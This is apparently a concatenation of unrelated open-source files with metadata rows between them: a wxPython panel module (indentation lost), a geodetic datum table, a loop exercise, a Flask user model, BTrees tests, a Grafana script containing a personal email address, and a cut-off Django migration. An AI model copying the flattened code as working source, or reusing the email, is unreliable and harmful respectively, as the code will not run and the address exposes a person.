___/ | | | | ___/ of speech
http://www.sppas.org/
Use of this software is governed by the GNU Public License, version 3.
SPPAS is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
SPPAS is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with SPPAS. If not, see <http://www.gnu.org/licenses/>.
This banner notice must not be removed.
---------------------------------------------------------------------
src.ui.phoenix.windows.panel.py
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"""
import wx
import wx.lib.scrolledpanel as sc
# ---------------------------------------------------------------------------
class sppasPanel(wx.Panel):
"""A panel is a window on which controls are placed.
:author: Brigitte Bigi
:organization: Laboratoire Parole et Langage, Aix-en-Provence, France
:contact: develop@sppas.org
:license: GPL, v3
:copyright: Copyright (C) 2011-2019 Brigitte Bigi
Possible constructors:
- sppasPanel()
- sppasPanel(parent, id=ID_ANY, pos=DefaultPosition, size=DefaultSize,
style=TAB_TRAVERSAL, name=PanelNameStr)
"""
def __init__(self, *args, **kw):
super(sppasPanel, self).__init__(*args, **kw)
s = wx.GetApp().settings
self.SetBackgroundColour(s.bg_color)
self.SetForegroundColour(s.fg_color)
self.SetFont(s.text_font)
self.SetAutoLayout(True)
self.SetMinSize(wx.Size(320, 200))
# -----------------------------------------------------------------------
def SetBackgroundColour(self, colour):
"""Override."""
wx.Panel.SetBackgroundColour(self, colour)
for c in self.GetChildren():
c.SetBackgroundColour(colour)
# -----------------------------------------------------------------------
def SetForegroundColour(self, colour):
"""Override."""
wx.Panel.SetForegroundColour(self, colour)
for c in self.GetChildren():
c.SetForegroundColour(colour)
# -----------------------------------------------------------------------
def SetFont(self, font):
"""Override."""
wx.Panel.SetFont(self, font)
for c in self.GetChildren():
c.SetFont(font)
self.Layout()
# -----------------------------------------------------------------------
@staticmethod
def fix_size(value):
"""Return a proportional size value.
:param value: (int)
:returns: (int)
"""
try:
obj_size = int(float(value) * wx.GetApp().settings.size_coeff)
except AttributeError:
obj_size = int(value)
return obj_size
# ---------------------------------------------------------------------------
class sppasScrolledPanel(sc.ScrolledPanel):
"""A panel is a window on which controls are placed.
:author: Brigitte Bigi
:organization: Laboratoire Parole et Langage, Aix-en-Provence, France
:contact: develop@sppas.org
:license: GPL, v3
:copyright: Copyright (C) 2011-2018 Brigitte Bigi
Possible constructors:
- sppasScrolledPanel()
- sppasScrolledPanel(parent, id=ID_ANY, pos=DefaultPosition,
size=DefaultSize, style=TAB_TRAVERSAL, name=PanelNameStr)
"""
def __init__(self, *args, **kw):
super(sppasScrolledPanel, self).__init__(*args, **kw)
s = wx.GetApp().settings
self.SetBackgroundColour(s.bg_color)
self.SetForegroundColour(s.fg_color)
self.SetFont(s.text_font)
# -----------------------------------------------------------------------
def SetBackgroundColour(self, colour):
"""Override."""
sc.ScrolledPanel.SetBackgroundColour(self, colour)
for c in self.GetChildren():
c.SetBackgroundColour(colour)
# -----------------------------------------------------------------------
def SetForegroundColour(self, colour):
"""Override."""
sc.ScrolledPanel.SetForegroundColour(self, colour)
for c in self.GetChildren():
c.SetForegroundColour(colour)
# -----------------------------------------------------------------------
def SetFont(self, font):
"""Override."""
sc.ScrolledPanel.SetFont(self, font)
for c in self.GetChildren():
c.SetFont(font)
self.Layout()
# -----------------------------------------------------------------------
@staticmethod
def fix_size(value):
"""Return a proportional size value.
:param value: (int)
:returns: (int)
"""
try:
obj_size = int(float(value) * wx.GetApp().settings.size_coeff)
except AttributeError:
obj_size = int(value)
return obj_size
| 32.107345 | 78 | 0.497273 | 514 | 5,683 | 5.375486 | 0.33463 | 0.028954 | 0.013029 | 0.021716 | 0.678972 | 0.624683 | 0.604415 | 0.604415 | 0.604415 | 0.604415 | 0 | 0.006433 | 0.261482 | 5,683 | 176 | 79 | 32.289773 | 0.651894 | 0.541791 | 0 | 0.758621 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.172414 | false | 0.034483 | 0.034483 | 0 | 0.275862 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
be4442d1df9dbd7d8be27b38766a39255db10dfb | 11,102 | py | Python | Tectonic_Utils/geodesy/datums.py | kmaterna/Utility_Code | 9894c831a4b2b6c4e4bdb577ad64492d8cd5bd17 | [
"MIT"
] | null | null | null | Tectonic_Utils/geodesy/datums.py | kmaterna/Utility_Code | 9894c831a4b2b6c4e4bdb577ad64492d8cd5bd17 | [
"MIT"
] | null | null | null | Tectonic_Utils/geodesy/datums.py | kmaterna/Utility_Code | 9894c831a4b2b6c4e4bdb577ad64492d8cd5bd17 | [
"MIT"
] | null | null | null | """
Convert between local enu, local llh, and global xyz coordinates
Translated from the Matlab toolkit of P. Segall and lab.
"""
import numpy as np
# Datum list --------------------------------------------------------------------
data = {
'ABINDAN ': [-1.121450e+002, -5.475071e-005, -162, -12, 206],
'AFGOOYE ': [-1.080000e+002, 4.807955e-007, -43, -163, 45],
'AIN EL ABD 1970 ': [-2.510000e+002, -1.419270e-005, -150, -251, -2],
'ANNA 1 ASTRO 1965 ': [-2.300000e+001, -8.120449e-008, -491, -22, 435],
'ARC 1950 ': [-1.121450e+002, -5.475071e-005, -143, -90, -294],
'ARC 1960 ': [-1.121450e+002, -5.475071e-005, -160, -8, -300],
'ASCENSION ISLAND 1958': [-2.510000e+002, -1.419270e-005, -207, 107, 52],
'ASTRO B4 SOROL ATOLL ': [-2.510000e+002, -1.419270e-005, 114, -116, -333],
'ASTRO BEACON "E" ': [-2.510000e+002, -1.419270e-005, 145, 75, -272],
'ASTRO DOS 71/4 ': [-2.510000e+002, -1.419270e-005, -320, 550, -494],
'ASTRONOMIC STN 1952 ': [-2.510000e+002, -1.419270e-005, 124, -234, -25],
'AUSTRALIAN GEOD 1966 ': [-2.300000e+001, -8.120449e-008, -133, -48, 148],
'AUSTRALIAN GEOD 1984 ': [-2.300000e+001, -8.120449e-008, -134, -48, 149],
'BD 72 ': [-2.510000e+002, -1.419270e-005, -126, 80, -101],
'BELLEVUE (IGN) ': [-2.510000e+002, -1.419270e-005, -127, -769, 472],
'BERMUDA 1957 ': [-6.940000e+001, -3.726464e-005, -73, 213, 296],
'BOGOTA OBSRVATRY ': [-2.510000e+002, -1.419270e-005, 307, 304, -318],
'CAMPO INCHAUSPE ': [-2.510000e+002, -1.419270e-005, -148, 136, 90],
'CANTON ASTRO 1966 ': [-2.510000e+002, -1.419270e-005, 298, -304, -375],
'CAPE ': [-1.121450e+002, -5.475071e-005, -136, -108, -292],
'CAPE CANAVERAL ': [-6.940000e+001, -3.726464e-005, -2, 150, 181],
'CARTHAGE ': [-1.121450e+002, -5.475071e-005, -263, 6, 431],
'CH-1903 ': [07.398450e+002, 1.003748e-005, 674, 15, 405],
'CHATHAM 1971 ': [-2.510000e+002, -1.419270e-005, 175, -38, 113],
'CHUA ASTRO ': [-2.510000e+002, -1.419270e-005, -134, 229, -29],
'CORREGO ALEGRE ': [-2.510000e+002, -1.419270e-005, -206, 172, -6],
'DJAKARTA (BATAVIA) ': [07.398450e+002, 1.003748e-005, -377, 681, -50],
'DOS 1968 ': [-2.510000e+002, -1.419270e-005, 230, -199, -752],
'EASTER ISLAND 1967 ': [-2.510000e+002, -1.419270e-005, 211, 147, 111],
'EUROPEAN 1950 ': [-2.510000e+002, -1.419270e-005, -87, -98, -121],
'EUROPEAN 1979 ': [-2.510000e+002, -1.419270e-005, -86, -98, -119],
'FINLAND HAYFORD ': [-2.510000e+002, -1.419270e-005, -78, -231, -97],
'GANDAJIKA BASE ': [-2.510000e+002, -1.419270e-005, -133, -321, 50],
'GEODETIC DATUM 1949 ': [-2.510000e+002, -1.419270e-005, 84, -22, 209],
'GUAM 1963 ': [-6.940000e+001, -3.726464e-005, -100, -248, 259],
'GUX 1 ASTRO ': [-2.510000e+002, -1.419270e-005, 252, -209, -751],
'HJORSEY 1955 ': [-2.510000e+002, -1.419270e-005, -73, 46, -86],
'HONG KONG 1963 ': [-2.510000e+002, -1.419270e-005, -156, -271, -189],
'HU-TZU-SHAN ': [-2.510000e+002, -1.419270e-005, -637, -549, -203],
'INDIAN BANGLADESH ': [08.606550e+002, 2.836137e-005, 289, 734, 257],
'INDIAN THAILAND ': [08.606550e+002, 2.836137e-005, 214, 836, 303],
'IRELAND 1965 ': [07.968110e+002, 1.196002e-005, 506, -122, 611],
'ISRAEL ': [-1.637890e+002, -5.473908e-005, -235, -85, 264],
'ISTS 073 ASTRO 1969 ': [-2.510000e+002, -1.419270e-005, 208, -435, -229],
'JOHNSTON ISLAND ': [-2.510000e+002, -1.419270e-005, 191, -77, -204],
'KANDAWALA ': [08.606550e+002, 2.836137e-005, -97, 787, 86],
'KERGUELEN ISLAND ': [-2.510000e+002, -1.419270e-005, 145, -187, 103],
'KERTAU 1948 ': [08.329370e+002, 2.836137e-005, -11, 851, 5],
'L.C. 5 ASTRO ': [-6.940000e+001, -3.726464e-005, 42, 124, 147],
'LIBERIA 1964 ': [-1.121450e+002, -5.475071e-005, -90, 40, 88],
'LUZON MINDANAO ': [-6.940000e+001, -3.726464e-005, -133, -79, -72],
'LUZON PHILIPPINES ': [-6.940000e+001, -3.726464e-005, -133, -77, -51],
'MAHE 1971 ': [-1.121450e+002, -5.475071e-005, 41, -220, -134],
'MARCO ASTRO ': [-2.510000e+002, -1.419270e-005, -289, -124, 60],
'MASSAWA ': [07.398450e+002, 1.003748e-005, 639, 405, 60],
'MERCHICH ': [-1.121450e+002, -5.475071e-005, 31, 146, 47],
'MICHELIN ': [01.614000e+003, 1.127918e-004, 1118, 23, 66],
'MIDWAY ASTRO 1961 ': [-2.510000e+002, -1.419270e-005, 912, -58, 1227],
'MINNA ': [-1.121450e+002, -5.475071e-005, -92, -93, 122],
'NAD27 ALASKA ': [-6.940000e+001, -3.726464e-005, -5, 135, 172],
'NAD27 BAHAMAS ': [-6.940000e+001, -3.726464e-005, -4, 154, 178],
'NAD27 CANADA ': [-6.940000e+001, -3.726464e-005, -10, 158, 187],
'NAD27 CANAL ZONE ': [-6.940000e+001, -3.726464e-005, 0, 125, 201],
'NAD27 CARIBBEAN ': [-6.940000e+001, -3.726464e-005, -7, 152, 178],
'NAD27 CENTRAL ': [-6.940000e+001, -3.726464e-005, 0, 125, 194],
'NAD27 CONUS ': [-6.940000e+001, -3.726464e-005, -8, 160, 176],
'NAD27 CUBA ': [-6.940000e+001, -3.726464e-005, -9, 152, 178],
'NAD27 GREENLAND ': [-6.940000e+001, -3.726464e-005, 11, 114, 195],
'NAD27 MEXICO ': [-6.940000e+001, -3.726464e-005, -12, 130, 190],
'NAD27 SAN SALVADOR ': [-6.940000e+001, -3.726464e-005, 1, 140, 165],
'NAD83 ': [00.000000e+000, -1.643484e-011, 0, 0, 0],
'NAHRWN MASIRAH ILND ': [-1.121450e+002, -5.475071e-005, -247, -148, 369],
'NAHRWN SAUDI ARABIA ': [-1.121450e+002, -5.575071e-005, -231, -196, 482],
'NAHRWN UNITED ARAB ': [-1.121450e+002, -5.475071e-005, -249, -156, 381],
'NAPARIMA BWI ': [-2.510000e+002, -1.419270e-005, -2, 374, 172],
'NETHERLANDS ': [07.400000e+002, 1.003748e-005, 593, 26, 478],
'OBSERVATORIO 1966 ': [-2.510000e+002, -1.419270e-005, -425, -169, 81],
'OLD EGYPTIAN ': [-6.300000e+001, 4.807955e-007, -130, 110, -13],
'OLD HAWAIIAN ': [-6.940000e+001, -3.726464e-005, 61, -285, -181],
'OMAN ': [-1.121450e+002, -5.475071e-005, -346, -1, 224],
'ORD SRVY GRT BRITN ': [05.736040e+002, 1.196002e-005, 375, -111, 431],
'PICO DE LAS NIEVES ': [-2.510000e+002, -1.419270e-005, -307, -92, 127],
'PITCAIRN ASTRO 1967 ': [-2.510000e+002, -1.419270e-005, 185, 165, 42],
'POTSDAM ': [07.398000e+002, 1.003748e-005, 587, 16, 393],
'PROV SO AMRICN 1956 ': [-2.510000e+002, -1.419270e-005, -288, 175, -376],
'PROV SO CHILEAN 1963 ': [-2.510000e+002, -1.419270e-005, 16, 196, 93],
'PUERTO RICO ': [-6.940000e+001, -3.726464e-005, 11, 72, -101],
'QATAR NATIONAL ': [-2.510000e+002, -1.419270e-005, -128, -283, 22],
'QORNOQ ': [-2.510000e+002, -1.419270e-005, 164, 138, -189],
'REUNION ': [-2.510000e+002, -1.419270e-005, 94, -948, -1262],
'ROME 1940 ': [-2.510000e+002, -1.419270e-005, -225, -65, 9],
'RT 90 ': [07.398450e+002, 1.003748e-005, 498, -36, 568],
'S-42 ': [-1.080000e+002, 4.807600e-007, 23, -124, -84],
'SANTO (DOS) ': [-2.510000e+002, -1.419270e-005, 170, 42, 84],
'SAO BRAZ ': [-2.510000e+002, -1.419270e-005, -203, 141, 53],
'SAPPER HILL 1943 ': [-2.510000e+002, -1.419270e-005, -355, 16, 74],
'SCHWARZECK ': [06.531350e+002, 1.003748e-005, 616, 97, -251],
'SOUTH AMERICAN 1969 ': [-2.300000e+001, -8.120449e-008, -57, 1, -41],
'SOUTH ASIA ': [-1.800000e+001, 4.807955e-007, 7, -10, -26],
'SOUTHEAST BASE ': [-2.510000e+002, -1.419270e-005, -499, -249, 314],
'SOUTHWEST BASE ': [-2.510000e+002, -1.419270e-005, -104, 167, -38],
'TIMBALAI 1948 ': [08.606550e+002, 2.836137e-005, -689, 691, -46],
'TOKYO ': [07.398450e+002, 1.003748e-005, -128, 481, 664],
'TRISTAN ASTRO 1968 ': [-2.510000e+002, -1.419270e-005, -632, 438, -609],
'VITI LEVU 1916 ': [-1.121450e+002, -5.475071e-005, 51, 391, -36],
'WAKE-ENIWETOK 1960 ': [-1.330000e+002, -1.419270e-005, 101, 52, -39],
'WGS 72 ': [02.000000e+000, 3.121058e-008, 0, 0, 5],
'WGS 84 ': [00.000000e+000, 0.000000e+000, 0, 0, 0],
'ZANDERIJ ': [-2.510000e+002, -1.419270e-005, -265, 120, -358]
}


def get_datums(names=None):
    """
    Returns da, df, dX, dY, dZ for each requested datum.

    DATUMVALUE = get_datums(DATUMNAMES) returns the datum parameters for each
    datum named in the sequence DATUMNAMES. These parameters are defined as
    differences to the WGS-84 ellipsoid:

    * da = WGS-84 equatorial radius minus the specified datum equatorial radius (meters)
    * df = WGS-84 flattening minus the specified datum flattening
    * dX = X-coordinate of WGS-84 geocenter minus the specified datum X-coordinate (meters)
    * dY = Y-coordinate of WGS-84 geocenter minus the specified datum Y-coordinate (meters)
    * dZ = Z-coordinate of WGS-84 geocenter minus the specified datum Z-coordinate (meters)

    For reference:

    * WGS-84 Equatorial Radius (a) = 6378137.0
    * WGS-84 Flattening (f) = 1/298.257223563

    Calling the function without input arguments returns the available datum names.
    Unmatched datums return NaNs.

    :param names: datum names to look up
    :type names: sequence of str
    :returns: one row of 5 numbers per requested datum, relative to WGS-84
    :rtype: numpy.ndarray
    """
    if not names:  # Return the available datum names if called with no input arguments.
        return data.keys()
    # Read the database. Match requested datums with those available.
    all_keys = data.keys()  # collect keys
    value = np.zeros((len(names), 5))  # initialize return value
    for i in range(len(names)):
        # Keys in the database are left-justified and space-padded to 21 characters.
        modified_name = "{:<21}".format(names[i].upper())
        if modified_name in all_keys:
            value[i, :] = data[modified_name]
        else:
            value[i, :] = [np.nan, np.nan, np.nan, np.nan, np.nan]
    return value
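# The lookup logic above can be exercised on a small subset of the table. Note that the
# dictionary keys are space-padded to 21 characters, which is why the function
# left-justifies the requested name before matching. A minimal self-contained sketch
# (two entries copied from the table; `lookup` is an illustrative stand-in, not the
# full module):

```python
import numpy as np

# Two entries from the table above; keys are space-padded to 21 characters.
data = {
    'WGS 84               ': [0.0, 0.0, 0, 0, 0],
    'TOKYO                ': [7.398450e+002, 1.003748e-005, -128, 481, 664],
}

def lookup(names):
    value = np.zeros((len(names), 5))
    for i, name in enumerate(names):
        # Upper-case and pad to 21 characters to match the key format.
        key = "{:<21}".format(name.upper())
        value[i, :] = data.get(key, [np.nan] * 5)
    return value

print(lookup(['tokyo', 'unknown datum']))
```

# Requesting 'tokyo' matches the padded key and returns its parameters; an unknown
# name yields a row of NaNs, mirroring the behaviour documented in the docstring.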
# Source file: cap5/c5e5.2.py (repo: JoseArtur/phyton-exercices, MIT license)

# Modify the program to show the numbers from 50 to 100
x = 50
while x <= 100:
    print(x)
    x = x + 1
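# The same exercise can also be solved with a `for` loop over `range`, which is the
# more idiomatic Python form:

```python
# Print the numbers from 50 to 100 inclusive.
# range(50, 101) stops one short of its end argument, hence 101.
for x in range(50, 101):
    print(x)
```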
# Source file: api/app/users/models.py (repo: Jean-Lytehouse/Lytehouse-Autocam, Apache-2.0 license)

from datetime import datetime, timedelta
from app import db, bcrypt, LOGGER
from app.utils.misc import make_code
from flask_login import UserMixin


def expiration_date():
    return datetime.now() + timedelta(days=1)


class AppUser(db.Model, UserMixin):
    id = db.Column(db.Integer(), primary_key=True)
    email = db.Column(db.String(255), unique=True, nullable=False)
    firstname = db.Column(db.String(100), nullable=False)
    lastname = db.Column(db.String(100), nullable=False)
    camera1Ip = db.Column(db.String(100), nullable=False)
    camera1Name = db.Column(db.String(100), nullable=False)
    camera2Ip = db.Column(db.String(100), nullable=False)
    camera2Name = db.Column(db.String(100), nullable=False)
    camera3Ip = db.Column(db.String(100), nullable=False)
    camera3Name = db.Column(db.String(100), nullable=False)
    password = db.Column(db.String(255), nullable=False)
    verified_email = db.Column(db.Boolean(), nullable=True)
    verify_token = db.Column(db.String(255), nullable=True, unique=True, default=make_code)

    def __init__(self,
                 email,
                 firstname,
                 lastname,
                 camera1Ip,
                 camera1Name,
                 camera2Ip,
                 camera2Name,
                 camera3Ip,
                 camera3Name,
                 password):
        self.email = email
        self.firstname = firstname
        self.lastname = lastname
        self.camera1Ip = camera1Ip
        self.camera1Name = camera1Name
        self.camera2Ip = camera2Ip
        self.camera2Name = camera2Name
        self.camera3Ip = camera3Ip
        self.camera3Name = camera3Name
        self.set_password(password)
        self.verified_email = True

    def set_password(self, password):
        self.password = bcrypt.generate_password_hash(password)

    def deactivate(self):
        self.active = False

    def verify(self):
        self.verified_email = True

    def update_email(self, new_email):
        self.verified_email = False
        self.verify_token = make_code()
        self.email = new_email

    def delete(self):
        self.is_deleted = True
        self.deleted_datetime_utc = datetime.now()


class PasswordReset(db.Model):
    id = db.Column(db.Integer(), primary_key=True)
    user_id = db.Column(db.Integer(), db.ForeignKey('app_user.id'))
    code = db.Column(db.String(255), unique=True, default=make_code)
    date = db.Column(db.DateTime(), default=expiration_date)
    user = db.relationship(AppUser)

    db.UniqueConstraint('user_id', 'code', name='uni_user_code')

    def __init__(self, user):
        self.user = user
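# The `make_code` helper imported from `app.utils.misc` is not shown in this file.
# A minimal sketch of what such a token generator might look like (hypothetical; the
# real implementation may differ) using the standard-library `secrets` module:

```python
import secrets

def make_code(n_bytes=32):
    # Return a URL-safe random token, suitable as a default for
    # verification and password-reset codes.
    return secrets.token_urlsafe(n_bytes)
```

# token_urlsafe(32) yields a roughly 43-character string, which fits comfortably in
# the String(255) columns used for `verify_token` and `code` above.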
# Source file: eggs/BTrees-4.1.1-py2.7-linux-x86_64.egg/BTrees/tests/test_IFBTree.py (repo: salayhin/talkofacta, MIT license)

##############################################################################
#
# Copyright (c) 2001-2012 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE
#
##############################################################################
import unittest
from .common import BTreeTests
from .common import ExtendedSetTests
from .common import InternalKeysMappingTest
from .common import InternalKeysSetTest
from .common import MappingBase
from .common import MappingConflictTestBase
from .common import ModuleTest
from .common import MultiUnion
from .common import NormalSetTests
from .common import SetConflictTestBase
from .common import SetResult
from .common import TestLongIntKeys
from .common import makeBuilder
from BTrees.IIBTree import using64bits #XXX Ugly, but unavoidable
class IFBTreeInternalKeyTest(InternalKeysMappingTest, unittest.TestCase):
    def _getTargetClass(self):
        from BTrees.IFBTree import IFBTree
        return IFBTree

class IFBTreePyInternalKeyTest(InternalKeysMappingTest, unittest.TestCase):
    def _getTargetClass(self):
        from BTrees.IFBTree import IFBTreePy
        return IFBTreePy

class IFTreeSetInternalKeyTest(InternalKeysSetTest, unittest.TestCase):
    def _getTargetClass(self):
        from BTrees.IFBTree import IFTreeSet
        return IFTreeSet

class IFTreeSetPyInternalKeyTest(InternalKeysSetTest, unittest.TestCase):
    def _getTargetClass(self):
        from BTrees.IFBTree import IFTreeSetPy
        return IFTreeSetPy

class IFBucketTest(MappingBase, unittest.TestCase):
    def _getTargetClass(self):
        from BTrees.IFBTree import IFBucket
        return IFBucket

class IFBucketPyTest(MappingBase, unittest.TestCase):
    def _getTargetClass(self):
        from BTrees.IFBTree import IFBucketPy
        return IFBucketPy

class IFTreeSetTest(NormalSetTests, unittest.TestCase):
    def _getTargetClass(self):
        from BTrees.IFBTree import IFTreeSet
        return IFTreeSet

class IFTreeSetPyTest(NormalSetTests, unittest.TestCase):
    def _getTargetClass(self):
        from BTrees.IFBTree import IFTreeSetPy
        return IFTreeSetPy

class IFSetTest(ExtendedSetTests, unittest.TestCase):
    def _getTargetClass(self):
        from BTrees.IFBTree import IFSet
        return IFSet

class IFSetPyTest(ExtendedSetTests, unittest.TestCase):
    def _getTargetClass(self):
        from BTrees.IFBTree import IFSetPy
        return IFSetPy

class IFBTreeTest(BTreeTests, unittest.TestCase):
    def _makeOne(self):
        from BTrees.IFBTree import IFBTree
        return IFBTree()

class IFBTreePyTest(BTreeTests, unittest.TestCase):
    def _makeOne(self):
        from BTrees.IFBTree import IFBTreePy
        return IFBTreePy()

if using64bits:

    class IFBTreeTest(BTreeTests, TestLongIntKeys, unittest.TestCase):
        def _makeOne(self):
            from BTrees.IFBTree import IFBTree
            return IFBTree()

        def getTwoValues(self):
            return 0.5, 1.5

    class IFBTreePyTest(BTreeTests, TestLongIntKeys, unittest.TestCase):
        def _makeOne(self):
            from BTrees.IFBTree import IFBTreePy
            return IFBTreePy()

        def getTwoValues(self):
            return 0.5, 1.5

class _TestIFBTreesBase(object):
    def testNonIntegerKeyRaises(self):
        self.assertRaises(TypeError, self._stringraiseskey)
        self.assertRaises(TypeError, self._floatraiseskey)
        self.assertRaises(TypeError, self._noneraiseskey)

    def testNonNumericValueRaises(self):
        self.assertRaises(TypeError, self._stringraisesvalue)
        self.assertRaises(TypeError, self._noneraisesvalue)
        self._makeOne()[1] = 1
        self._makeOne()[1] = 1.0

    def _stringraiseskey(self):
        self._makeOne()['c'] = 1

    def _floatraiseskey(self):
        self._makeOne()[2.5] = 1

    def _noneraiseskey(self):
        self._makeOne()[None] = 1

    def _stringraisesvalue(self):
        self._makeOne()[1] = 'c'

    def _floatraisesvalue(self):
        self._makeOne()[1] = 1.4

    def _noneraisesvalue(self):
        self._makeOne()[1] = None

class TestIFBTrees(_TestIFBTreesBase, unittest.TestCase):
    def _makeOne(self):
        from BTrees.IFBTree import IFBTree
        return IFBTree()

class TestIFBTreesPy(_TestIFBTreesBase, unittest.TestCase):
    def _makeOne(self):
        from BTrees.IFBTree import IFBTreePy
        return IFBTreePy()

class TestIFMultiUnion(MultiUnion, unittest.TestCase):
    def multiunion(self, *args):
        from BTrees.IFBTree import multiunion
        return multiunion(*args)

    def union(self, *args):
        from BTrees.IFBTree import union
        return union(*args)

    def mkset(self, *args):
        from BTrees.IFBTree import IFSet as mkset
        return mkset(*args)

    def mktreeset(self, *args):
        from BTrees.IFBTree import IFTreeSet as mktreeset
        return mktreeset(*args)

    def mkbucket(self, *args):
        from BTrees.IFBTree import IFBucket as mkbucket
        return mkbucket(*args)

    def mkbtree(self, *args):
        from BTrees.IFBTree import IFBTree as mkbtree
        return mkbtree(*args)

class TestIFMultiUnionPy(MultiUnion, unittest.TestCase):
    def multiunion(self, *args):
        from BTrees.IFBTree import multiunionPy
        return multiunionPy(*args)

    def union(self, *args):
        from BTrees.IFBTree import unionPy
        return unionPy(*args)

    def mkset(self, *args):
        from BTrees.IFBTree import IFSetPy as mkset
        return mkset(*args)

    def mktreeset(self, *args):
        from BTrees.IFBTree import IFTreeSetPy as mktreeset
        return mktreeset(*args)

    def mkbucket(self, *args):
        from BTrees.IFBTree import IFBucketPy as mkbucket
        return mkbucket(*args)

    def mkbtree(self, *args):
        from BTrees.IFBTree import IFBTreePy as mkbtree
        return mkbtree(*args)

class PureIF(SetResult, unittest.TestCase):
    def union(self, *args):
        from BTrees.IFBTree import union
        return union(*args)

    def intersection(self, *args):
        from BTrees.IFBTree import intersection
        return intersection(*args)

    def difference(self, *args):
        from BTrees.IFBTree import difference
        return difference(*args)

    def builders(self):
        from BTrees.IFBTree import IFBTree
        from BTrees.IFBTree import IFBucket
        from BTrees.IFBTree import IFTreeSet
        from BTrees.IFBTree import IFSet
        return IFSet, IFTreeSet, makeBuilder(IFBTree), makeBuilder(IFBucket)

class PureIFPy(SetResult, unittest.TestCase):
    def union(self, *args):
        from BTrees.IFBTree import unionPy
        return unionPy(*args)

    def intersection(self, *args):
        from BTrees.IFBTree import intersectionPy
        return intersectionPy(*args)

    def difference(self, *args):
        from BTrees.IFBTree import differencePy
        return differencePy(*args)

    def builders(self):
        from BTrees.IFBTree import IFBTreePy
        from BTrees.IFBTree import IFBucketPy
        from BTrees.IFBTree import IFTreeSetPy
        from BTrees.IFBTree import IFSetPy
        return (IFSetPy, IFTreeSetPy,
                makeBuilder(IFBTreePy), makeBuilder(IFBucketPy))

class IFBTreeConflictTests(MappingConflictTestBase, unittest.TestCase):
    def _getTargetClass(self):
        from BTrees.IFBTree import IFBTree
        return IFBTree

class IFBTreePyConflictTests(MappingConflictTestBase, unittest.TestCase):
    def _getTargetClass(self):
        from BTrees.IFBTree import IFBTreePy
        return IFBTreePy

class IFBucketConflictTests(MappingConflictTestBase, unittest.TestCase):
    def _getTargetClass(self):
        from BTrees.IFBTree import IFBucket
        return IFBucket

class IFBucketPyConflictTests(MappingConflictTestBase, unittest.TestCase):
    def _getTargetClass(self):
        from BTrees.IFBTree import IFBucketPy
        return IFBucketPy

class IFTreeSetConflictTests(SetConflictTestBase, unittest.TestCase):
    def _getTargetClass(self):
        from BTrees.IFBTree import IFTreeSet
        return IFTreeSet

class IFTreeSetPyConflictTests(SetConflictTestBase, unittest.TestCase):
    def _getTargetClass(self):
        from BTrees.IFBTree import IFTreeSetPy
        return IFTreeSetPy

class IFSetConflictTests(SetConflictTestBase, unittest.TestCase):
    def _getTargetClass(self):
        from BTrees.IFBTree import IFSet
        return IFSet

class IFSetPyConflictTests(SetConflictTestBase, unittest.TestCase):
    def _getTargetClass(self):
        from BTrees.IFBTree import IFSetPy
        return IFSetPy

class IFModuleTest(ModuleTest, unittest.TestCase):
    prefix = 'IF'

    def _getModule(self):
        import BTrees
        return BTrees.IFBTree

    def _getInterface(self):
        import BTrees.Interfaces
        return BTrees.Interfaces.IIntegerFloatBTreeModule

def test_suite():
    return unittest.TestSuite((
        unittest.makeSuite(IFBTreeInternalKeyTest),
        unittest.makeSuite(IFBTreePyInternalKeyTest),
        unittest.makeSuite(IFTreeSetInternalKeyTest),
        unittest.makeSuite(IFTreeSetPyInternalKeyTest),
        unittest.makeSuite(IFBucketTest),
        unittest.makeSuite(IFBucketPyTest),
        unittest.makeSuite(IFTreeSetTest),
        unittest.makeSuite(IFTreeSetPyTest),
        unittest.makeSuite(IFSetTest),
        unittest.makeSuite(IFSetPyTest),
        unittest.makeSuite(IFBTreeTest),
        unittest.makeSuite(IFBTreePyTest),
        unittest.makeSuite(TestIFBTrees),
        unittest.makeSuite(TestIFBTreesPy),
        unittest.makeSuite(TestIFMultiUnion),
        unittest.makeSuite(TestIFMultiUnionPy),
        unittest.makeSuite(PureIF),
        unittest.makeSuite(PureIFPy),
        unittest.makeSuite(IFBTreeConflictTests),
        unittest.makeSuite(IFBTreePyConflictTests),
        unittest.makeSuite(IFBucketConflictTests),
        unittest.makeSuite(IFBucketPyConflictTests),
        unittest.makeSuite(IFTreeSetConflictTests),
        unittest.makeSuite(IFTreeSetPyConflictTests),
        unittest.makeSuite(IFSetConflictTests),
        unittest.makeSuite(IFSetPyConflictTests),
        unittest.makeSuite(IFModuleTest),
    ))
# Source file: action-grafana-app-dashboards/test.py (repo: asksven/self-services-operations, MIT license)

from grafana_api.grafana_face import GrafanaFace
import os
print(os.environ['GRAFANA_HOST'])
# grafana_api = GrafanaFace(protocol='https', auth=os.environ['GRAFANA_API_KEY'], host=os.environ['GRAFANA_HOST'])
grafana_api = GrafanaFace(auth=(os.environ['GRAFANA_USER'], os.environ['GRAFANA_PWD']), protocol='https', host=os.environ['GRAFANA_HOST'])
print('Logged in')
# Find a user by email
user = grafana_api.users.find_user('sven.knispel@gmail.com')
print(user)
source_folder_id = '46'
res = grafana_api.search.search_dashboards(folder_ids=source_folder_id)
print(res)
for dashboard in res:
    print(dashboard["title"])
# Source file: overtrick/almanac/migrations/0001_initial.py (repo: katemakescode/overtrick, MIT license)

# Generated by Django 3.1.5 on 2021-01-24 20:31
from django.db import migrations, models


